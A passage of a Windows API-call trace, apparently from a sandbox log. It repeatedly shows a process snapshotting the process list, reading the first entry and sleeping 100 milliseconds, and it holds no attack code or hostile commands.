0x24b8 [0250.569] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.680] Sleep (dwMilliseconds=0x64) [0250.682] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0250.697] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.773] Sleep (dwMilliseconds=0x64) [0250.774] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0250.788] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.857] Sleep (dwMilliseconds=0x64) [0250.860] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0250.872] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.940] Sleep (dwMilliseconds=0x64) [0250.944] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0250.958] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.050] Sleep (dwMilliseconds=0x64) [0251.052] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0251.067] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.142] Sleep (dwMilliseconds=0x64) [0251.145] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0251.165] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.254] Sleep (dwMilliseconds=0x64) [0251.257] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0251.271] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.333] Sleep (dwMilliseconds=0x64) [0251.335] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0251.347] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.447] Sleep (dwMilliseconds=0x64) [0251.449] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0251.462] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.517] Sleep (dwMilliseconds=0x64) [0251.519] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0251.531] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.598] Sleep (dwMilliseconds=0x64) [0251.600] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0251.614] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.682] Sleep (dwMilliseconds=0x64) [0251.683] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0251.696] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.748] Sleep (dwMilliseconds=0x64) [0251.751] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0251.765] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.822] Sleep (dwMilliseconds=0x64) [0251.825] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0251.838] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.896] Sleep (dwMilliseconds=0x64) [0251.899] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0251.914] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.983] Sleep (dwMilliseconds=0x64) [0251.986] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0252.039] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.102] Sleep (dwMilliseconds=0x64) [0252.104] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0252.120] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.176] Sleep (dwMilliseconds=0x64) [0252.179] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0252.203] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.256] Sleep (dwMilliseconds=0x64) [0252.258] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0252.274] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.339] Sleep (dwMilliseconds=0x64) [0252.341] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0252.358] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.425] Sleep (dwMilliseconds=0x64) [0252.428] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0252.448] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.507] Sleep (dwMilliseconds=0x64) [0252.509] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0252.525] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.581] Sleep (dwMilliseconds=0x64) [0252.586] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0252.605] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.664] Sleep (dwMilliseconds=0x64) [0252.667] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0252.718] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.784] Sleep (dwMilliseconds=0x64) [0252.790] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0252.810] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.884] Sleep (dwMilliseconds=0x64) [0252.886] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0252.909] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.087] Sleep (dwMilliseconds=0x64) [0253.092] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0253.110] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.185] Sleep (dwMilliseconds=0x64) [0253.199] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0253.218] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.298] Sleep (dwMilliseconds=0x64) [0253.301] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0253.319] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.420] Sleep (dwMilliseconds=0x64) [0253.423] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0253.454] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.534] Sleep (dwMilliseconds=0x64) [0253.540] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0253.559] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.625] Sleep (dwMilliseconds=0x64) [0253.628] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0253.643] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.721] Sleep (dwMilliseconds=0x64) [0253.724] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0253.742] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.818] Sleep (dwMilliseconds=0x64) [0253.820] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0253.836] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.915] Sleep (dwMilliseconds=0x64) [0253.918] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0253.936] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.036] Sleep (dwMilliseconds=0x64) [0254.044] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0254.060] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.138] Sleep (dwMilliseconds=0x64) [0254.281] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0254.312] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.378] Sleep (dwMilliseconds=0x64) [0254.387] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0254.400] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.482] Sleep (dwMilliseconds=0x64) [0254.485] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0254.501] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.583] Sleep (dwMilliseconds=0x64) [0254.589] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0254.607] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.677] Sleep (dwMilliseconds=0x64) [0254.681] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0254.696] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.760] Sleep (dwMilliseconds=0x64) [0254.762] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0254.774] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.839] Sleep (dwMilliseconds=0x64) [0254.841] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0254.855] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.924] Sleep (dwMilliseconds=0x64) [0254.927] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0254.939] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.032] Sleep (dwMilliseconds=0x64) [0255.035] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0255.053] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.127] Sleep (dwMilliseconds=0x64) [0255.129] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0255.145] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.218] Sleep (dwMilliseconds=0x64) [0255.222] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0255.239] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.309] Sleep (dwMilliseconds=0x64) [0255.311] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0255.329] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.447] Sleep (dwMilliseconds=0x64) [0255.449] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0255.469] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.542] Sleep (dwMilliseconds=0x64) [0255.545] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0255.561] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.628] Sleep (dwMilliseconds=0x64) [0255.630] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0255.643] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.713] Sleep (dwMilliseconds=0x64) [0255.715] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0255.732] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.796] Sleep (dwMilliseconds=0x64) [0255.799] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0255.815] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.878] Sleep (dwMilliseconds=0x64) [0255.881] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0255.899] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0255.967] Sleep (dwMilliseconds=0x64) [0255.973] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0255.987] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.097] Sleep (dwMilliseconds=0x64) [0256.099] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0256.114] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.187] Sleep (dwMilliseconds=0x64) [0256.199] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0256.214] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.289] Sleep (dwMilliseconds=0x64) [0256.291] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0256.304] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.374] Sleep (dwMilliseconds=0x64) [0256.376] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0256.433] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, 